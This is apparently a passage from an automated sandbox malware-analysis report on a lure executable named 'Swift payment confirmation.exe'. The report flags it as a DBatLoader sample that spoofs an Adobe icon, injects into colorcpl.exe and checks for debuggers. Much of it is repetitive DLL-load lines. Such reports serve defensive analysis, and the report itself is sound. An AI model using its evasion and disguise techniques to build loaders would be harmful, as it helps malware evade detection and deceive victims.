            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeWindow found: window name: SysTabControl32Jump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeWindow detected: Number of UI elements: 12
            Source: Binary string: easinvoker.pdb source: Swift payment confirmation.exe, Swift payment confirmation.exe, 00000000.00000002.2174249610.00000000032DE000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2042668817.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2041882325.000000007FE00000.00000004.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: colorcpl.exe, 00000002.00000003.2252350083.0000000004C3C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000003.2255245800.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000002.2307528675.0000000026760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000002.2307528675.00000000268FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: colorcpl.exe, colorcpl.exe, 00000002.00000003.2252350083.0000000004C3C000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000003.2255245800.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000002.2307528675.0000000026760000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000002.00000002.2307528675.00000000268FE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: easinvoker.pdbGCTL source: Swift payment confirmation.exe, 00000000.00000002.2174249610.00000000032DE000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2173823942.0000000003211000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2042668817.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2042440140.0000000002FDB000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000003.2041882325.000000007FE00000.00000004.00001000.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Yara detected DBatLoader
            Source: Yara matchFile source: 0.2.Swift payment confirmation.exe.32b0000.0.unpack, type: UNPACKEDPE
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_032C894C
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032B332C push eax; ret 0_2_032B3368
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032DC378 push 032DC56Eh; ret 0_2_032DC566
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032BC349 push 8B032BC1h; ret 0_2_032BC34E
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032B63AE push 032B640Bh; ret 0_2_032B6403
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032B63B0 push 032B640Bh; ret 0_2_032B6403
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032DD2FC push 032DD367h; ret 0_2_032DD35F
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032CF108 push ecx; mov dword ptr [esp], edx0_2_032CF10D
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032DD144 push 032DD1ECh; ret 0_2_032DD1E4
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032DD1F8 push 032DD288h; ret 0_2_032DD280
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C306C push 032C30B9h; ret 0_2_032C30B1
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C306B push 032C30B9h; ret 0_2_032C30B1
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032DD0AC push 032DD125h; ret 0_2_032DD11D
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032B6782 push 032B67C6h; ret 0_2_032B67BE
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032B6784 push 032B67C6h; ret 0_2_032B67BE
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032BC56C push ecx; mov dword ptr [esp], edx0_2_032BC571
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032DC570 push 032DC56Eh; ret 0_2_032DC566
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032BD5A0 push 032BD5CCh; ret 0_2_032BD5C4
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032BCBEC push 032BCD72h; ret 0_2_032BCD6A
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_03324A50 push eax; ret 0_2_03324B20
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032BCA4E push 032BCD72h; ret 0_2_032BCD6A
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032CAAE0 push 032CAB18h; ret 0_2_032CAB10
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032CAADF push 032CAB18h; ret 0_2_032CAB10
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C8AD8 push 032C8B10h; ret 0_2_032C8B08
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C790C push 032C7989h; ret 0_2_032C7981
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C6948 push 032C69F3h; ret 0_2_032C69EB
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C6946 push 032C69F3h; ret 0_2_032C69EB
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C886C push 032C88AEh; ret 0_2_032C88A6
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C2F60 push 032C2FD6h; ret 0_2_032C2FCE
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C5E7C push ecx; mov dword ptr [esp], edx0_2_032C5E7E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_06442F80 push eax; ret 2_2_06442F82
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_06446C76 pushad ; ret 2_2_06446C77

            Hooking and other Techniques for Hiding and Protection

            barindex
            Icon mismatch, binary includes an icon from a different legit application in order to fool users
            Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: adobe 12.png
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032CAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_032CAB1C
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D096E rdtsc 2_2_267D096E
            Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 0.6 %
            Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1288Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032B5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_032B5908
            Source: Swift payment confirmation.exe, 00000000.00000002.2171637621.000000000087D000.00000004.00000020.00020000.00000000.sdmp, Swift payment confirmation.exe, 00000000.00000002.2171637621.000000000081E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeAPI call chain: ExitProcess graph end nodegraph_0-32635
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032CF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,0_2_032CF744
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D096E rdtsc 2_2_267D096E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_267D2C70
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeCode function: 0_2_032C894C LoadLibraryW,GetProcAddress,FreeLibrary,0_2_032C894C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C2674 mov eax, dword ptr fs:[00000030h]2_2_267C2674
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA660 mov eax, dword ptr fs:[00000030h]2_2_267CA660
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267CA660 mov eax, dword ptr fs:[00000030h]2_2_267CA660
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AC640 mov eax, dword ptr fs:[00000030h]2_2_267AC640
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2679262C mov eax, dword ptr fs:[00000030h]2_2_2679262C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C6620 mov eax, dword ptr fs:[00000030h]2_2_267C6620
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267C8620 mov eax, dword ptr fs:[00000030h]2_2_267C8620
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267AE627 mov eax, dword ptr fs:[00000030h]2_2_267AE627
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267D2619 mov eax, dword ptr fs:[00000030h]2_2_267D2619
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268106F1 mov eax, dword ptr fs:[00000030h]2_2_268106F1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_268106F1 mov eax, dword ptr fs:[00000030h]2_2_268106F1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A260B mov eax, dword ptr fs:[00000030h]2_2_267A260B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A260B mov eax, dword ptr fs:[00000030h]2_2_267A260B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A260B mov eax, dword ptr fs:[00000030h]2_2_267A260B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A260B mov eax, dword ptr fs:[00000030h]2_2_267A260B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A260B mov eax, dword ptr fs:[00000030h]2_2_267A260B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A260B mov eax, dword ptr fs:[00000030h]2_2_267A260B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_267A260B mov eax, dword ptr fs:[00000030h]2_2_267A260B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680E6F2 mov eax, dword ptr fs:[00000030h]2_2_2680E6F2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680E6F2 mov eax, dword ptr fs:[00000030h]2_2_2680E6F2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680E6F2 mov eax, dword ptr fs:[00000030h]2_2_2680E6F2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 2_2_2680E6F2 mov eax, dword ptr fs:[00000030h]2_2_2680E6F2
